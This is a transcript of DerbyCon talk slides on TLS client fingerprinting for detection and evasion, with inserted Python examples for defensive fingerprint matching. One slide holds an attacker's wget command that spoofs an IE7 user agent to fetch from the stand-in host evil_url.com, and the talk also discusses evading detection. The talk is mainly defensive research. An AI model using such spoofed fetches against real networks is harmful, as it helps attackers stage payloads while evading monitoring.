TLS Fingerprinting - Stealthier Attacking & Smarter Defending - DerbyCon


Post on 12-Apr-2017


TRANSCRIPT

  • Stealthier Attacks & Smarter Defending
    with TLS Fingerprinting
    Lee Brotherston
    @synackpse #TLSFP

  • A Zero Math, (almost) Zero Crypto, TLS Talk
    Lee Brotherston
    @synackpse #TLSFP

  • TLS PRIMER .. (Shhhh. It's not a cryptographic algorithm)

  • [Diagram: TCP three-way handshake between Client and Server: SYN, SYN/ACK, ACK. The client side is labelled "Kittens.. Unicorn Tears, Pixie Dust".]

  • [Diagram: TLS handshake between Client and Server: Client Hello, Server Hello, Client Key Exchange, Change Cipher Spec (both directions), Encrypted Data.]

  • Fingerprints

  • Why Clients?

  • Server-side cipher configuration (Apache mod_ssl, Postfix, Dovecot):

    SSLCipherSuite RC4-SHA:AES128-SHA:HIGH:!aNULL:!MD5
    SSLHonorCipherOrder on

    smtpd_tls_mandatory_ciphers = high
    smtpd_tls_mandatory_exclude_ciphers = aNULL, MD5
    smtpd_tls_mandatory_protocols = !SSLv2, !SSLv3
    smtpd_tls_mandatory_protocols = TLSv1

    ssl_cipher_list = ALL:!LOW:!SSLv2:!EXP:!aNULL

  • Origin Story

  • Expanding

  • Client Hello layout:
    Record header: Content Type | Version | Length
    Handshake: Type | Length | Version | Random | Session ID Length | Session ID | Cipher Suites Length | Cipher Suites | Compression Methods Length | Compression Methods | Extensions


  • Extensions

  • Key - value: order is significant!

  • Creating a FingerPrint

  • {
      "id": 0,
      "desc": "Dropbox (Win 8.1)",
      "record_tls_version": "0x0301",
      "tls_version": "0x0301",
      "ciphersuite_length": "0x0010",
      "ciphersuite": "0xC014 0xC013 0xC011 0x0039 0x0033 0x0035 0x002F 0x00FF",
      "compression_length": "1",
      "compression": "0x00",
      "extensions": "0x0000 0x0023",
      "server_name": "client-lb.dropbox.com"
    }

  • Deobfuscation

  • ssh -p443 user@myhost
    (don't pretend you don't)

  • Any Port
    Stateless
    Asymmetric
    Low Cost

  • BPF filter, loose (record and Client Hello version bytes 3 or 0 accepted):
    tcp[tcp[12]/16*4]=22 and (tcp[tcp[12]/16*4+5]=1)
    and ((tcp[tcp[12]/16*4+9]=3) or (tcp[tcp[12]/16*4+9]=0))
    and ((tcp[tcp[12]/16*4+1]=3) or (tcp[tcp[12]/16*4+1]=0))

  • BPF filter, strict (version bytes must be 3):
    tcp[tcp[12]/16*4]=22 and (tcp[tcp[12]/16*4+5]=1) and (tcp[tcp[12]/16*4+9]=3) and (tcp[tcp[12]/16*4+1]=3)
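As an added example (not code from the talk or from FingerprinTLS), the following Python walks the Client Hello layout from the earlier slide, pulls out the same fields as the JSON fingerprint, applies the strict BPF filter's byte checks to a raw TCP segment in Python, and matches the parsed fields against a small database. The database entry is transcribed from the Dropbox JSON on the slides; the Client Hello bytes, the TCP header, the helper names and the "Unknown" label are constructed for this example. Cipher suites and extensions are kept as ordered tuples, so the same suites in a different order are a different fingerprint.

```python
"""Added example: Client Hello -> fingerprint fields -> database match.

Not code from the talk or from FingerprinTLS.  Field names follow the JSON
fingerprint on the slides; the sample Client Hello bytes, the TCP header and
the fingerprint database below are constructed for this example.
"""
import struct

FINGERPRINT_KEYS = ("record_tls_version", "tls_version", "ciphersuite_length",
                    "ciphersuite", "compression_length", "compression", "extensions")

# Constructed database: the single entry is transcribed from the slides' JSON.
# Suites and extensions are ordered tuples because order is part of the fingerprint.
FINGERPRINT_DB = {
    (0x0301, 0x0301, 0x0010,
     (0xC014, 0xC013, 0xC011, 0x0039, 0x0033, 0x0035, 0x002F, 0x00FF),
     1, (0x00,), (0x0000, 0x0023)): "Dropbox (Win 8.1)",
}


def looks_like_client_hello(tcp_segment: bytes) -> bool:
    """Python form of the slides' strict BPF filter over the first payload bytes."""
    data_offset = (tcp_segment[12] >> 4) * 4        # tcp[12]/16*4: TCP header length
    p = tcp_segment[data_offset:]
    if len(p) < 11:
        return False
    return (p[0] == 22          # record content type: handshake
            and p[5] == 1       # handshake type: Client Hello
            and p[1] == 3       # record version, major byte
            and p[9] == 3)      # Client Hello version, major byte


def parse_client_hello(record: bytes) -> dict:
    """Extract the fingerprint fields from a TLS record carrying a Client Hello."""
    content_type, rec_version, rec_len = struct.unpack("!BHH", record[:5])
    body = record[5:5 + rec_len]
    if content_type != 22 or body[0] != 1:
        raise ValueError("not a Client Hello handshake record")
    hs = body[4:4 + int.from_bytes(body[1:4], "big")]
    version = struct.unpack("!H", hs[:2])[0]
    pos = 2 + 32                                     # client_version + 32-byte random
    pos += 1 + hs[pos]                               # session id length + session id
    cs_len = struct.unpack("!H", hs[pos:pos + 2])[0]
    pos += 2
    suites = [struct.unpack("!H", hs[pos + i:pos + i + 2])[0] for i in range(0, cs_len, 2)]
    pos += cs_len
    comp_len = hs[pos]
    comps = list(hs[pos + 1:pos + 1 + comp_len])
    pos += 1 + comp_len
    ext_types, server_name = [], None
    if pos + 2 <= len(hs):                           # extensions block is optional
        end = pos + 2 + struct.unpack("!H", hs[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", hs[pos:pos + 4])
            edata = hs[pos + 4:pos + 4 + elen]
            pos += 4 + elen
            ext_types.append(etype)
            if etype == 0x0000 and len(edata) >= 5:  # server_name: list len, type, name len, name
                name_len = struct.unpack("!H", edata[3:5])[0]
                server_name = edata[5:5 + name_len].decode("ascii", "replace")
    return {"record_tls_version": rec_version, "tls_version": version,
            "ciphersuite_length": cs_len, "ciphersuite": suites,
            "compression_length": comp_len, "compression": comps,
            "extensions": ext_types, "server_name": server_name}


def fingerprint_key(fields: dict) -> tuple:
    """Hashable key over every field except server_name, which varies per site."""
    return tuple(tuple(v) if isinstance(v, list) else v
                 for v in (fields[k] for k in FINGERPRINT_KEYS))


def match_fingerprint(fields: dict) -> str:
    return FINGERPRINT_DB.get(fingerprint_key(fields), "Unknown")


def build_client_hello(suites, server_name, extra_ext_types=(), version=0x0301) -> bytes:
    """Construct a minimal Client Hello record as sample input (not captured traffic)."""
    host = server_name.encode()
    sni = struct.pack("!HBH", len(host) + 3, 0, len(host)) + host
    exts = struct.pack("!HH", 0x0000, len(sni)) + sni
    exts += b"".join(struct.pack("!HH", t, 0) for t in extra_ext_types)  # empty-bodied extensions
    hs = struct.pack("!H", version) + bytes(32) + b"\x00"               # version, random, no session id
    hs += struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
    hs += b"\x01\x00"                                                   # one compression method: null
    hs += struct.pack("!H", len(exts)) + exts
    body = b"\x01" + len(hs).to_bytes(3, "big") + hs
    return struct.pack("!BHH", 22, version, len(body)) + body


def build_tcp_segment(payload: bytes, header_len: int = 32) -> bytes:
    """Constructed TCP header with only the data offset filled in, followed by the payload."""
    hdr = bytearray(header_len)
    hdr[12] = (header_len // 4) << 4
    return bytes(hdr) + payload
```

Usage: build a Client Hello with the Dropbox suite list and `extra_ext_types=(0x0023,)`, pass `build_tcp_segment(hello)` through `looks_like_client_hello` as the capture filter would, then `parse_client_hello` and `match_fingerprint`. Swapping the first two cipher suites makes the match fall through to "Unknown", which is the point of the "order is significant" slide.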

  • Storage & Retention

  • Filter                            Client to Server   Server to Client   False Positive
    Unfiltered                              9547378            3776313          99.226%
    Handshake & Client Hello Filter           51766                 59           2.859%
    1st Byte TLS Version                      51677                  3           0.005%
    1st Byte TLS Version (Record)             51677                  0           0.000%

  • Moving on..

  • Own Fingerprint Modification

  • Collisions?
    (Car & Photo: @snipeyhead)

  • Yes. OK, no. Sort of.. a bit. Occasionally.

  • Defender Level 1: Detection

  • SRC                  DEST
    192.168.1.37:3847    66.185.84.30:443
    192.168.1.37:44870   74.125.226.150:443
    192.168.1.49:36469   38.229.70.22:6667
    192.168.1.122:51593  54.204.30.235:22
    10.54.107.19:64926   194.54.103.65:22
    10.54.103.99:3010    54.204.30.201:443
    10.54.103.76:3013    64.136.25.171:80
    10.54.103.66:3847    192.168.10.64:25
    10.54.103.33:3009    54.204.30.11:443
    10.54.103.99:3010    192.168.10.10:443

  • Attribution: Alex Pinto, MLSec

  • $ sudo tcpdump -Xni eth0 host desktop
    16:29:39.149010 IP 10.54.103.76.3010 > 54.204.30.201.443: Flags [P.], seq 826:991, ack 990, win 64, options [nop,nop,TS val 1123747053 ecr 530699601], length 165
    0x0000: 4500 00d9 62a9 4000 3306 586b 36af 939e  E...b.@.3.Xk6...
    0x0010: c0a8 0115 01bb c04d 49e3 2eec fb96 5e29  .......MI.....^)
    0x0020: 8018 0040 ff69 0000 0101 080a 42fb 04ed  ...@.i......B...
    0x0030: 1fa1 d551 1703 0300 a008 7a4c d2cf 56e3  ...Q......zL..V.
    0x0040: b83a b448 3e23 accd 3495 a547 202a e88a  .:.H>#..4..G.*..
    0x0050: f05d 9f25 121a 9e1e 4944 4431 f493 0b4d  .].%....IDD1...M
    0x0060: e5fc c83c a77c 0cf6 6adb 96d6 7b05 481d  ...

  • Probably Browsing ¯\_(ツ)_/¯


  • SRC                  DEST
    192.168.1.37:3847    www.google.com:443
    192.168.1.37:44870   Unknown:443
    192.168.1.49:36469   FreeNode IRC:6667
    192.168.1.122:51593  AWS Something:22
    10.54.107.19:64926   Unknown:22
    10.54.103.99:3010    AWS Something:443
    10.54.103.76:3013    Unknown:80
    10.54.103.66:3847    Internal SMTP:25
    10.54.103.33:3009    AWS Something:443
    10.54.103.99:3010    Sharepoint:443

  • [Same SRC/DEST table, now with client fingerprint labels added to the rows: mitmproxy, Tor]

  • Anomaly Detection

  • Not Just Hax0ring

  • Attacker Level 1: Stealth MiTM

  • ARP Cache Poisoning
    DNS Spoofing
    BGP Hijacking
    Hacked Proxy
    Malicious Tor Node
    Local Agent
    Malicious Provider
    Rogue DHCP

  • TLS Attacks

  • [Diagram: Client, Evil Server (Hacker) and Real Server. The Client's TCP SYN, SYN/ACK, ACK and Client Hello terminate at the Evil Server, which sits between Client and Real Server.]

  • Defender Level 2: Fingerprint Defined Routing

  • [Diagram: Client, Defence, Real Server and HoneyPot. After TCP SYN, SYN/ACK, ACK the Client Hello reaches the Defence, which routes the connection to the Real Server or to the HoneyPot by fingerprint.]

  • Attacker Level 2: AntiForensics

  • Enumerated Targets
    Prepared Exploits
    Delivered Stager/Phish
    Awaiting Callback

  • Meanwhile:
    wget --user-agent="Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" https://evil_url.com/thing/

  • [Diagram: Client (IE7) to Legit Server, Hacker (wget) to Attack Server; TCP SYN, SYN/ACK, ACK, then Client Hello. The User-Agent claims IE7, the Client Hello is wget's.]

  • Defender Level 3: Fingerprint Canaries

  • Homogeneous Platforms
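As an added example (not code from the talk or from FingerprinTLS), the following Python shows the two checks a defender gets from the last few slides: the Attacker Level 2 case, where the HTTP User-Agent claims IE7 but the TLS fingerprint says wget, and the Fingerprint Canaries / Homogeneous Platforms case, where anything that is not the fleet's one known client is flagged. It reads log lines in the "Fingerprint Matched: ..." line format that the FingerprinTLS output on this page uses. The log lines, access-log entries, addresses, hostnames, the "wget (constructed label)" fingerprint name and the fleet list are all constructed for this example.

```python
"""Added example: cross-check TLS fingerprint labels against HTTP claims and a fleet baseline.

Not code from the talk or from FingerprinTLS.  The TLS log lines are constructed
in the "Fingerprint Matched: ..." format of the FingerprinTLS output on these
slides; the access-log entries, hosts, addresses and the fleet list are made up.
"""
import re

FP_LINE = re.compile(
    r'Fingerprint Matched: "(?P<fp>[^"]+)" (?P<tls>TLSv1\.\d) connection from '
    r'(?P<src>[\d.]+:\d+) to (?P<dst>[\d.]+:\d+)')

# Constructed FingerprinTLS-style output seen in front of a canary host.
TLS_LOG = """\
Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56274 to 10.9.9.9:443 Servername: "canary.example.test"
Fingerprint Matched: "wget (constructed label)" TLSv1.2 connection from 192.168.1.77:40111 to 10.9.9.9:443 Servername: "canary.example.test"
Fingerprint Matched: "Tor uplink" TLSv1.2 connection from 192.168.1.12:51222 to 37.0.0.1:9001 Servername: "www.example.test"
Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.8:56300 to 10.9.9.9:443 Servername: "canary.example.test"
"""

# Constructed web-server access log: (client ip:port, User-Agent header the client sent).
ACCESS_LOG = [
    ("192.168.1.5:56274", "Mozilla/5.0 (Macintosh) AppleWebKit/600.7.12 Safari/600.7.12"),
    ("192.168.1.77:40111", "Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"),
    ("192.168.1.8:56300", "Mozilla/5.0 (Macintosh) AppleWebKit/600.7.12 Safari/600.7.12"),
]

# Fleet baseline for a homogeneous platform: the only client expected on this network.
KNOWN_GOOD = {"AppleWebKit/600.7.12"}

# Coarse client families; the first keyword found in a label or User-Agent wins.
FAMILIES = ("applewebkit", "wget", "msie", "tor", "curl")


def parse_tls_log(text: str) -> list:
    """One dict (fp, tls, src, dst) per matching line; other lines are skipped."""
    return [m.groupdict() for m in (FP_LINE.search(l) for l in text.splitlines()) if m]


def family(label: str) -> str:
    """Collapse a fingerprint label or a User-Agent string to a client family."""
    lowered = label.lower()
    return next((f for f in FAMILIES if f in lowered), "other")


def ua_mismatches(entries: list, access_log: list) -> list:
    """Connections whose TLS fingerprint family disagrees with the User-Agent family."""
    ua_by_src = dict(access_log)
    return [(e["src"], e["fp"], ua_by_src[e["src"]])
            for e in entries
            if e["src"] in ua_by_src and family(e["fp"]) != family(ua_by_src[e["src"]])]


def fleet_anomalies(entries: list, known_good: set) -> list:
    """Connections whose fingerprint is not one of the fleet's expected clients."""
    return [(e["src"], e["fp"]) for e in entries if e["fp"] not in known_good]


if __name__ == "__main__":
    entries = parse_tls_log(TLS_LOG)
    for src, fp, ua in ua_mismatches(entries, ACCESS_LOG):
        print(f"UA/TLS mismatch {src}: TLS says {fp!r}, HTTP says {ua!r}")
    for src, fp in fleet_anomalies(entries, KNOWN_GOOD):
        print(f"not a fleet client {src}: {fp!r}")
```

The join key is the client ip:port pair, which both the TLS sensor and the web server see for the same connection. The family table is deliberately coarse: the point is only whether the TLS stack and the claimed browser belong to the same product, not exact version matching.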

  • End Of Level Boss: Nation State Attackers (zomg!)

  • Honorable Mention: HoneyPots

  • Tools

  • FingerprinTLS
    $ sudo ./ssl_fingerprint/fingerprintls/fingerprintls -i en0 -s
    Password:
    Using interface: en0
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56274 to 104.244.43.39:443 Servername: "pbs.twimg.com"
    Fingerprint Matched: "Tor uplink" TLSv1.2 connection from 192.168.1.5:56281 to 167.114.152.100:443 Servername: "www.i6l66pzauglk2kqx2b.com"
    Fingerprint Matched: "Tor uplink" TLSv1.2 connection from 192.168.1.5:56280 to 37.221.162.226:9001 Servername: "www.jy27vswlheykb2dptady.com"
    Fingerprint Matched: "mutt (tested: 1.5.23 - OS X)" TLSv1.2 connection from 192.168.1.5:56316 to 74.125.69.108:993 Servername: "Not Set"
    Fingerprint Matched: "ThunderBird (v38.0.1 OS X)" TLSv1.2 connection from 192.168.1.5:56394 to 74.125.69.108:993 Servername: "imap.gmail.com"
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56233 to 104.244.43.199:443 Servername: "pbs.twimg.com"
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56236 to 23.195.217.14:443 Servername: "s.mzstatic.com"
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56242 to 184.25.66.217:443 Servername: "itunes.apple.com"
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56243 to 23.195.218.30:443 Servername: "su.itunes.apple.com"
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56246 to 23.21.97.18:443 Servername: "vine.co"
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56247 to 184.25.66.217:443 Servername: "init.itunes.apple.com"
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56248 to 104.244.43.229:443 Servername: "v.cdn.vine.co"
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56250 to 17.173.66.136:443 Servername: "xp.apple.com"
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56253 to 23.195.217.14:443 Servername: "s.mzstatic.com"
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56259 to 23.195.218.30:443 Servername: "se.itunes.apple.com"
    Fingerprint Matched: "AppleWebKit/600.7.12" TLSv1.2 connection from 192.168.1.5:56267 to 104.244.43.167:443 Servername: "pbs.twimg.com"
    Fingerprint Matched: "AppleWebKit/600.7.12 or 600.1.4" TLSv1.2 connection from 192.168.1.5:56273 to 104.244.43.7:443 Servername: "pbs.twimg.com"

  • Fingerprintout
    { 0, "Shodan", 0x0301, 0x0302, 0x0010,
      {0x00,0x14, 0x00,0x11, 0x00,0x19, 0x00,0x08, 0x00,0x06, 0x00,0x17, 0x00,0x03, 0x00,0xFF},
      1, {0x00}, 4, {0x00,0x23,0x00,0x0F}, 0, {}, 0, {}, 0, {} }

  • alert tcp any any -> any any ( msg:"ruby script (tested: 2.0.0p481)"; content: "|16 03 01|"; offset: 0; depth: 3; rawbytes; content: "|01|"; distance: 1; rawbytes; content: "|03 01|"; distance: 3; rawbytes; byte_jump: 1,43,a